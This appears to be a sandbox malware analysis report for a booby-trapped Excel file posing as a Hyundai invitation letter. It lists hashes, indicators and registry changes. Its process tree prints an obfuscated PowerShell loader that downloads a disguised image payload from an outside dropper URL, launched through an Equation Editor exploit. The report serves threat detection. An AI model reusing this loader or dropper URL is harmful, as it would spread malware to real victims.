3151eeb337bdc0be093f392e879cb8eaf3a44d10d012f3296cd029a35d763d45

Analysis

max time kernel
122s
max time network
126s
platform
windows7_x64
resource
win7-20231020-en
resource tags

arch:x64arch:x86image:win7-20231020-enlocale:en-usos:windows7-x64system
submitted
14/11/2023, 00:47

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

HYUNDAI INVITATION LETTER.xls
Size

282KB
MD5

8ebd7658975d158beeb4587ac66d2628
SHA1

b83a388737ab385163ef9ddb715a45d04550f138
SHA256

1f9447b936dfc7d9b4ed44796367ade3baa9dec8776e18154b3e45b4cb08bebc
SHA512

99fa927495f1604b4a876f85953ff6d5718096705481c5fce7dedc5cffbb5f62b7f5a7228339522876ae34aa3539753b48bf250c2ca6b3e02abe65b321d22ecc
SSDEEP

6144:EXRC/eu3YDp7LLFY35qAOJl/YrLYz+WrNhZF+E+fgL+0dD8ivSbVsnMI0zBRBmSg:EX4mw3bVsnMIOfm

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://uploaddeimagens.com.br/images/004/654/536/original/new_image.jpg?1698957750

exe.dropper

https://uploaddeimagens.com.br/images/004/654/536/original/new_image.jpg?1698957750

Signatures

Blocklisted process makes network request 5 IoCs

flow	pid	Process
9	2628	EQNEDT32.EXE
11	1292	WScript.exe
13	2304	powershell.exe
15	2304	powershell.exe
17	2304	powershell.exe

Abuses OpenXML format to download file from external location

Drops file in System32 directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Office loads VBA resources, possible macro or embedded object present

Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE

Launches Equation Editor 1 TTPs 1 IoCs

Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

exploit

Exploitation for Client Execution

T1203

pid	Process
2628	EQNEDT32.EXE

Modifies Internet Explorer settings 1 TTPs 31 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1154728922-3261336865-3456416385-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"	EXCEL.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1154728922-3261336865-3456416385-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1154728922-3261336865-3456416385-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1154728922-3261336865-3456416385-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1154728922-3261336865-3456416385-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1154728922-3261336865-3456416385-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell	WINWORD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1154728922-3261336865-3456416385-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"	EXCEL.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1154728922-3261336865-3456416385-1000\Software\Microsoft\Internet Explorer\Toolbar	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1154728922-3261336865-3456416385-1000\Software\Microsoft\Internet Explorer\MenuExt	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command	WINWORD.EXE

Modifies registry class 64 IoCs

description	ioc	Process
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon\ = "\"%1\""	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohevi.dll"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\ = "&Print"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\ = "&Open"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version\14	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\ = "&Open"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\ = "&Open"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\ = "[open(\"%1\")]"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\application	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\application\ = "Excel"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ = "&Open"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\ShellEx	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\ = "[open(\"%1\")]"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\ = "&Open"	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic\ = "system"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ = "&Open"	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\ = "[open(\"%1\")]"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\ = "&Edit"	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic\ = "system"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\topic\ = "system"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ThreadingModel = "Apartment"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic\ = "system"	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE

Script User-Agent 1 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	11	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
1908	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
632	powershell.exe
2304	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	632	powershell.exe
Token: SeDebugPrivilege	2304	powershell.exe
Token: SeShutdownPrivilege	2820	WINWORD.EXE

Suspicious use of SetWindowsHookEx 5 IoCs

pid	Process
1908	EXCEL.EXE
1908	EXCEL.EXE
1908	EXCEL.EXE
2820	WINWORD.EXE
2820	WINWORD.EXE

Suspicious use of WriteProcessMemory 16 IoCs

description	pid	Process	procid_target
PID 2628 wrote to memory of 1292	2628	EQNEDT32.EXE	31
PID 2628 wrote to memory of 1292	2628	EQNEDT32.EXE	31
PID 2628 wrote to memory of 1292	2628	EQNEDT32.EXE	31
PID 2628 wrote to memory of 1292	2628	EQNEDT32.EXE	31
PID 2820 wrote to memory of 584	2820	WINWORD.EXE	32
PID 2820 wrote to memory of 584	2820	WINWORD.EXE	32
PID 2820 wrote to memory of 584	2820	WINWORD.EXE	32
PID 2820 wrote to memory of 584	2820	WINWORD.EXE	32
PID 1292 wrote to memory of 632	1292	WScript.exe	34
PID 1292 wrote to memory of 632	1292	WScript.exe	34
PID 1292 wrote to memory of 632	1292	WScript.exe	34
PID 1292 wrote to memory of 632	1292	WScript.exe	34
PID 632 wrote to memory of 2304	632	powershell.exe	36
PID 632 wrote to memory of 2304	632	powershell.exe	36
PID 632 wrote to memory of 2304	632	powershell.exe	36
PID 632 wrote to memory of 2304	632	powershell.exe	36

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\HYUNDAI INVITATION LETTER.xls"
1⤵
- Enumerates system info in registry
- Modifies Internet Explorer settings
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:1908

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" -Embedding
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2820
- C:\Windows\splwow64.exe
  C:\Windows\splwow64.exe 12288
  2⤵
  PID:584

C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
1⤵
- Blocklisted process makes network request
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
PID:2628
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\browserhistoryclean.vbs"
  2⤵
  - Blocklisted process makes network request
  - Suspicious use of WriteProcessMemory
  PID:1292
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = 'KçCtBKçCtBKnçCtBKDçCtBKçCtBKVQBGçCtBKGkçCtBKbQBhçCtBKGcçCtBKZQBVçCtBKHIçCtBKbçCtBKçCtBKgçCtBKD0çCtBKIçCtBKçCtBK1çCtBKG8çCtBKWçCtBKBoçCtBKHQçCtBKdçCtBKBwçCtBKHMçCtBKOgçCtBKvçCtBKC8çCtBKdQBwçCtBKGwçCtBKbwBhçCtBKGQçCtBKZçCtBKBlçCtBKGkçCtBKbQBhçCtBKGcçCtBKZQBuçCtBKHMçCtBKLgBjçCtBKG8çCtBKbQçCtBKuçCtBKGIçCtBKcgçCtBKvçCtBKGkçCtBKbQBhçCtBKGcçCtBKZQBzçCtBKC8çCtBKMçCtBKçCtBKwçCtBKDQçCtBKLwçCtBK2çCtBKDUçCtBKNçCtBKçCtBKvçCtBKDUçCtBKMwçCtBK2çCtBKC8çCtBKbwByçCtBKGkçCtBKZwBpçCtBKCcçCtBKKwçCtBKnçCtBKG4çCtBKYQBsçCtBKC8çCtBKbgBlçCtBKHcçCtBKXwBpçCtBKG0çCtBKYQBnçCtBKGUçCtBKLgBqçCtBKHçCtBKçCtBKJwçCtBKrçCtBKCcçCtBKZwçCtBK/çCtBKDEçCtBKNgçCtBK5çCtBKDgçCtBKOQçCtBK1çCtBKDcçCtBKNwçCtBK1çCtBKDçCtBKçCtBKNQBvçCtBKFgçCtBKOwçCtBKwçCtBKFUçCtBKRgB3çCtBKGUçCtBKYgBDçCtBKGwçCtBKaQBlçCtBKG4çCtBKdçCtBKçCtBKgçCtBKD0çCtBKIçCtBKBOçCtBKGUçCtBKdwçCtBKtçCtBKE8çCtBKYgBqçCtBKGUçCtBKYwB0çCtBKCçCtBKçCtBKUwB5çCtBKHMçCtBKJwçCtBKrçCtBKCcçCtBKdçCtBKBlçCtBKG0çCtBKLgçCtBKnçCtBKCsçCtBKJwBOçCtBKGUçCtBKdçCtBKçCtBKuçCtBKFcçCtBKZQBiçCtBKEMçCtBKbçCtBKBpçCtBKGUçCtBKbgB0çCtBKDsçCtBKMçCtBKBVçCtBKEYçCtBKaQBtçCtBKGEçCtBKZwBlçCtBKEIçCtBKeQB0çCtBKGUçCtBKcwçCtBKgçCtBKD0çCtBKIçCtBKçCtBKwçCtBKFUçCtBKRgB3çCtBKGUçCtBKYgBDçCtBKGwçCtBKaQBlçCtBKG4çCtBKdçCtBKçCtBKuçCtBKEQçCtBKbwB3çCtBKG4çCtBKbçCtBKBvçCtBKGEçCtBKZçCtBKBEçCtBKGEçCtBKdçCtBKBhçCtBKCgçCtBKMçCtBKBVçCtBKEYçCtBKaQBtçCtBKGEçCtBKZwBlçCtBKFUçCtBKcgBsçCtBKCkçCtBKOwçCtBKwçCtBKFUçCtBKRgBpçCtBKG0çCtBKYQBnçCtBKGUçCtBKVçCtBKBlçCtBKHgçCtBKdçCtBKçCtBKgçCtBKD0çCtBKIçCtBKBbçCtBKFMçCtBKeQBzçCtBKHQçCtBKZQBtçCtBKC4çCtBKVçCtBKBlçCtBKHgçCtBKdçCtBKçCtBKuçCtBKEUçCtBKbgBjçCtBKG8çCtBKZçCtBKBpçCtBKG4çCtBKZwBdçCtBKDoçCtBKOgBVçCtBKFQçCtBKRgçCtBK4çCtBKC4çCtBKRwBlçCtBKHQçCtBKUwB0çCtBKHIçCtBKaQBuçCtBKGcçCtBKKçCtBKçCtBKwçCtBKFUçCtBKRgBpçCtBKG0çCtBKYQBnçCtBKGUçCtBKQgB5çCtBKHQçCtBKZQBzçCtBKCkçCtBKOwçCtBKwçCtBKCcçCtBKKwçCtBKnçCtBKFUçCtBKRgBzçCtBKHQçCtBKYQByçCtBKHQçCtBKJwçCtBKrçCtBKCcçCtBKRgBsçCtBKGEçCtBKZwçCtBKgçCtBKD0çCtBKIçCtBKçCtBK1çCtBKG8çCtBKWçCtBKçCtBK8çCtBKDwçCtBKQgBBçCtBKFMçCtBKRQçCtBK2çCtBKCcçCtBKKwçCtBKnçCtBKDQçCtBKXwBTçCtBKFQçCtBKQQBSçCtBKFQçCtBKPgçCtBK+çCtBKDUçCtBKbwBYçCtBKDsçCtBKMçCtBKçCtBKnçCtBKCsçCtBKJwBVçCtBKCcçCtBKKwçCtBKnçCtBKEYçCtBKZQBuçCtBKGQçCtBKRgBsçCtBKGEçCtBKZwçCtBKgçCtBKD0çCtBKIçCtBKçCtBK1çCtBKG8çCtBKWçCtBKçCtBK8çCtBKDwçCtBKQgBBçCtBKFMçCtBKRQçCtBK2çCtBKDQçCtBKXwBFçCtBKE4çCtBKRçCtBKçCtBK+çCtBKD4çCtBKNQBvçCtBKFgçCtBKOwçCtBKwçCtBKFUçCtBKRgBzçCtBKHQçCtBKYQByçCtBKHQçCtBKSQBuçCtBKGQçCtBKZQB4çCtBKCçCtBKçCtBKPQçCtBKgçCtBKDçCtBKçCtBKVQBGçCtBKGkçCtBKbQBhçCtBKGcçCtBKZQçCtBKnçCtBKCsçCtBKJwBUçCtBKGUçCtBKeçCtBKB0çCtBKC4çCtBKSQBuçCtBKGQçCtBKZQB4çCtBKE8çCtBKZgçCtBKoçCtBKDçCtBKçCtBKVQBGçCtBKHMçCtBKdçCtBKBhçCtBKHIçCtBKdçCtBKçCtBKnçCtBKCsçCtBKJwBGçCtBKGwçCtBKYQBnçCtBKCkçCtBKOwçCtBKwçCtBKFUçCtBKRgBlçCtBKG4çCtBKZçCtBKBJçCtBKG4çCtBKZçCtBKBlçCtBKHgçCtBKIçCtBKçCtBKnçCtBKCsçCtBKJwçCtBK9çCtBKCçCtBKçCtBKMçCtBKBVçCtBKEYçCtBKaQBtçCtBKGEçCtBKZwBlçCtBKFQçCtBKZQB4çCtBKHQçCtBKLgBJçCtBKG4çCtBKZçCtBKBlçCtBKHgçCtBKTwBmçCtBKCgçCtBKMçCtBKBVçCtBKEYçCtBKZQBuçCtBKGQçCtBKRgBsçCtBKGEçCtBKZwçCtBKpçCtBKDsçCtBKMçCtBKBVçCtBKEYçCtBKcwB0çCtBKGEçCtBKcgB0çCtBKEkçCtBKbgBkçCtBKGUçCtBKeçCtBKçCtBKgçCtBKC0çCtBKZwBlçCtBKCçCtBKçCtBKMçCtBKçCtBKgçCtBKC0çCtBKYQBuçCtBKGQçCtBKIçCtBKçCtBKwçCtBKFUçCtBKRgBlçCtBKG4çCtBKZçCtBKBJçCtBKG4çCtBKZçCtBKBlçCtBKHgçCtBKIçCtBKçCtBKtçCtBKGcçCtBKdçCtBKçCtBKgçCtBKDçCtBKçCtBKVQBGçCtBKHMçCtBKJwçCtBKrçCtBKCcçCtBKdçCtBKBhçCtBKHIçCtBKdçCtBKBJçCtBKCcçCtBKKwçCtBKnçCtBKG4çCtBKZçCtBKBlçCtBKHgçCtBKOwçCtBKwçCtBKFUçCtBKRgBzçCtBKHQçCtBKYQByçCtBKHQçCtBKSQBuçCtBKCcçCtBKKwçCtBKnçCtBKGQçCtBKZQB4çCtBKCçCtBKçCtBKKwçCtBK9çCtBKCçCtBKçCtBKMçCtBKBVçCtBKEYçCtBKcwB0çCtBKGEçCtBKcgB0çCtBKEYçCtBKbçCtBKBhçCtBKGcçCtBKLgBMçCtBKGUçCtBKbgBnçCtBKHQçCtBKaçCtBKçCtBK7çCtBKDçCtBKçCtBKVQBGçCtBKCcçCtBKKwçCtBKnçCtBKGIçCtBKYQBzçCtBKGUçCtBKNgçCtBK0çCtBKEwçCtBKZQBuçCtBKGcçCtBKdçCtBKBoçCtBKCçCtBKçCtBKPQçCtBKgçCtBKDçCtBKçCtBKVQBGçCtBKGUçCtBKbgBkçCtBKEkçCtBKbgBkçCtBKGUçCtBKeçCtBKçCtBKgçCtBKC0çCtBKIçCtBKçCtBKwçCtBKFUçCtBKRgBzçCtBKHQçCtBKYQByçCtBKHQçCtBKSQBuçCtBKGQçCtBKZQB4çCtBKDsçCtBKMçCtBKBVçCtBKEYçCtBKYgBhçCtBKHMçCtBKZQçCtBK2çCtBKDQçCtBKQwBvçCtBKG0çCtBKbQBhçCtBKG4çCtBKZçCtBK